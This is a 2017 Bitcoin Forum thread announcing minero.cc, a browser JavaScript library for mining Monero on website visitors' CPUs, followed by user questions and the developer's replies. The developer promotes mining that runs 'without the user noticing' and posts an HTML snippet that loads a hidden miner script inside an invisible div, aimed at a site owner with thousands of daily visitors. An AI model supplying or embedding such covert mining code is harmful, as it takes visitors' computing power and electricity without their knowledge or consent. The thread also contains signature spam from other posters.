Bitcoin Forum
May 30, 2024, 07:40:01 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]

Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: Monero web mining with minero.cc  (Read 899 times)
minerocc (OP)

Activity: 8
Merit: 0

View Profile
October 19, 2017, 07:13:32 AM

Announcing https://minero.cc, a JavaScript plugin for mining Monero (XMR) in Web browsers.

It can be used for solo mining without installing software, and it can be integrated in your website and use your visitor's CPU to mine Monero for you. It is a good alternative to ads for monetizing websites.

The technologies used are NaCL and WASM, which allow safe execution of efficient applications on modern browsers. Because it's safe, it can run without asking the user for permission, so it can run in the background without the user noticing.

You get paid fairly for the amount of hashes that you contribute. You get 80% of the mining reward and the remaining 20% goes to cover the running costs of the service. This fee is lower than what similar services charge.

I'm the main developer of the service and I'm looking for feedback. Happy to answer questions too.
dudutti

Activity: 77
Merit: 10

View Profile WWW
October 19, 2017, 07:57:31 AM

thanks i'll take a look.
Good point is custom mining speed Smiley
DevelopmentBank

Activity: 406
Merit: 110

View Profile
October 19, 2017, 09:37:18 AM

This kind of tech is really rising in popularity the past few months. Great job with the simple to use implementation.

Is this open source? Preferably a Github project page? I'd love to see how this works and of course it would be nice to see that we are indeed getting 80% of the mining profits.
dx_twisted

Activity: 294
Merit: 114

View Profile
October 19, 2017, 09:55:21 AM

Okay, so what is the big difference here? If its a web base browsing then Minergate already has this kind of function. Will I get better mining speed or a horrendous speed same with minergate? Does your miner get its power on CPU or GPU? I do hope you'll make it clearer for us or rather share screenshots and link on how the actual miner works.
minerocc (OP)

View Profile
October 20, 2017, 04:25:43 AM

Is this open source? Preferably a Github project page? I'd love to see how this works and of course it would be nice to see that we are indeed getting 80% of the mining profits.

It's not open source at the moment. I don't plan to open source it any time soon but maybe one day.

As to verifying that users actually get 80% of the rewards, that can be done without having any server-side code. The logic in JS is quite simple and if you really wanted you could take a look at the code, count the number of hashes you are computing, and then do the math to compare that against how much you are getting paid.
antonio88s

Activity: 423
Merit: 118

View Profile
October 20, 2017, 05:20:44 AM

How could I make some testing with that script ? I have many website which have thousands visitor per day.
chup

Activity: 736
Merit: 262

Me, Myself & I

View Profile
October 20, 2017, 05:44:10 AM

Okay, so what is the big difference here? If its a web base browsing then Minergate already has this kind of function. Will I get better mining speed or a horrendous speed same with minergate? Does your miner get its power on CPU or GPU? I do hope you'll make it clearer for us or rather share screenshots and link on how the actual miner works.

Probably biggest difference is that Minergate does not offer any more browser mining.

minerocc (OP)

View Profile
October 21, 2017, 09:16:25 AM

How could I make some testing with that script ? I have many website which have thousands visitor per day.

If you want the miner to run in the background while your users visit the website, you can simply use the hidden miner out of the box.

If you want to be very conservative on the resources that you use from your visitors, I recommend that you start with throttle enabled to 0.5, and maybe later change it closer to 0, or just drop it. The final code you need to insert in your HTML source should look something like this:

Code:
<script src="https://minero.cc/lib/minero-hidden.min.js" async></script>
<div class="minero-hidden" style="display: none" data-key="YOUR_SITE_KEY" data-throttle="0.5"></div>

You will need to replace YOUR_SITE_KEY with your actual key, which you can get from the dashboard after you sign up.

Let me know if it works well for you. Good luck!
The_Don

Activity: 308
Merit: 250

View Profile
October 21, 2017, 11:18:29 AM

cashout is instant ?? and minimum ??

● LuckyBit ●                                                         
Digital Currency for Gambling Industry Based on MASTERNODE & ASIC RESISTANT Algorithm
|       DISCORD      |      TELEGRAM      |      ANN THREAD      |      FACEBOOK      |      TWITTER       |
minerocc (OP)

View Profile
October 22, 2017, 04:52:44 AM

cashout is instant ?? and minimum ??

Cashout is instant as soon as you reach the minimum, which is configurable to no lower than 0.5 XMR.

One feedback I've received is that 0.5 XMR is too hard to reach for small publishers and we are currently looking at ways to lower it.
felixbrucker

Activity: 700
Merit: 500

View Profile WWW
October 22, 2017, 09:21:44 AM

from my first look it seems like a copy pasta from coin-hive

did you code it yourself?

i'm not sure about the licenses but that might be a problem, just my 2 cents
jimskiy

Activity: 574
Merit: 100

Bitway.net - The Best Bitcoin Mining Network

View Profile
October 22, 2017, 10:53:51 AM

Looks great.. I will try this on my web site.. And let see how is it goin.. Cheesy

BTC BitwayBTC
The Best Bitcoin Mining Network
────────  DiscordInstagram ♦  Twitter ♦  Bitcointalk ♦  Reddit ♦  Facebook   ────────
Nataly2014

Activity: 40

View Profile
December 09, 2017, 05:08:55 PM

Hi all! The theme still has to live? Someone used this offer. It is more profitable than coinhive?
Thank you!
Pages: [1]
  Print  

Jump to: